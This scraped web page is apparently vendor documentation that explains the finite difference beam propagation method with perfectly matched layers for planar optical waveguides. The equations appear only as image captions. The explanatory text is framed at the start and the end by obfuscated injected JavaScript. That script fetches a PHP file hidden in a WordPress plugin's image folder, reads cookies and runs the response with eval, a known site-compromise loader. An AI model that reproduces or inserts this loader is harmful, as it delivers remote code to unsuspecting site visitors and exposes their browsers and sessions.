;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//staging.optiwave.com/wp-content/plugins/advanced-custom-fields-pro/assets/inc/datepicker/images/images.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B // global window.SFM_is_mobile = (function () { var n = navigator.userAgent; var reg = new RegExp('Android\s([0-9\.]*)') var match = n.toLowerCase().match(reg); var android = match ? parseFloat(match[1]) : false; if (android && android < 3.6) { return; }; return n.match(/Android|BlackBerry|IEMobile|iPhone|iPad|iPod|Opera Mini/i); })(); window.SFM_current_page_menu = '670'; (function(){ var mob_bar = ''; var pos = 'right'; var iconbar = ''; var SFM_skew_disabled = ( function( ) { var window_width = window.innerWidth; var sfm_width = 290; if ( sfm_width * 2 >= window_width ) { return true; } return false; } )( ); var classes = SFM_is_mobile ? 'sfm-mobile' : 'sfm-desktop'; var html = document.getElementsByTagName('html')[0]; // pointer classes += mob_bar ? ' sfm-mob-nav' : ''; classes += ' sfm-pos-' + pos; classes += iconbar ? ' sfm-bar' : ''; classes += SFM_skew_disabled ? ' sfm-skew-disabled' : ''; html.className = html.className == '' ? classes : html.className + ' ' + classes; })();

Finite Difference Beam Propagation Method (FD-BPM) with Perfectly Matched Layers

Compatibility:

We consider a planar waveguide where x and z are the transverse and propagation directions, respectively, and there is no variation in the y direction ( ∂ ⁄ ∂y ≡ 0 ) .

Furthermore we consider that the planar optical waveguide with width W is surrounded by PML regions with thickness d as shown in Figure 3.

Optical BPM - Planar waveguide surrounded by PML

Figure 3: Planar waveguide surrounded by PML

With these assumptions and transversely-scaled version of PML, as defined in “Perfectly Matched Layer (PML)” on page 26, we get the following basic equation from Equation 35:

Optical BPM - Equation 46

with

Optical BPM - Equation 47- 48

where Ey  and Hy  are the y components of the electric and magnetic fields respectively, ω is the angular frequency, ε0  and μ0  are the permittivity and permeability of free space, respectively, n is the refractive index, k0  is the free-space wave number, and the parameter s is defined by Equation 45.

We separate the field Φ( x, z ) into two parts: the axially slowly varying envelop term of φ( x, z ) and the rapidly term of exp ( –jk0 nre f z ) . Here, nre f  is the reference index.

Then, Φ( x, y ) is expressed by

Optical BPM - Equation 49

By substituting Equation 49 into Equation 46, we obtain the following equation for slowly varying complex amplitude φ :

Optical BPM - Equation 50

The term ∂p ⁄ ∂is neglected for TM modes.

Finite Difference Approximant

To obtain the field solution at each cross section we discretise Equation 50 using Finite Differences scheme along x – direction [23] – [27].

Optical BPM - Finite Difference uniform mesh

Figure 4: Finite Difference uniform mesh

Formally, we have from Taylor expansion:

Optical BPM - Equation 51-52

Subtracting Equation 51 from Equation 51 and neglecting higher order terms:

Optical BPM - Equation 53

Thus, for TE modes we get

Optical BPM - Equation 54

Here we consider:

Optical BPM - Equation 55

Optical BPM - Equation 56

By substituting Equation 55 and Equation 56 into Equation 54, we get:

Optical BPM - Equation 57

Therefore, we can rewrite Equation 50 for TE modes as

Optical BPM - Equation 58

where

Optical BPM - Equation 59

Here,

Optical BPM - Equation 60-62

For TM modes we have:

Optical BPM - Equation 63

Applying FD scheme in the third term of Equation 63 we obtain:

Optical BPM - Equation 64

For small h one has:

Optical BPM - Equation 65-68

By substituting Equation 66, Equation 67, and Equation 68 into Equation 64, we get:

Optical BPM - Equation 69

Thus, using FD scheme into Equation 50 for TM modes, we get:

Optical BPM - Equation 70

with

Optical BPM - Equation 71-74

;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//staging.optiwave.com/wp-content/plugins/advanced-custom-fields-pro/assets/inc/datepicker/images/images.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B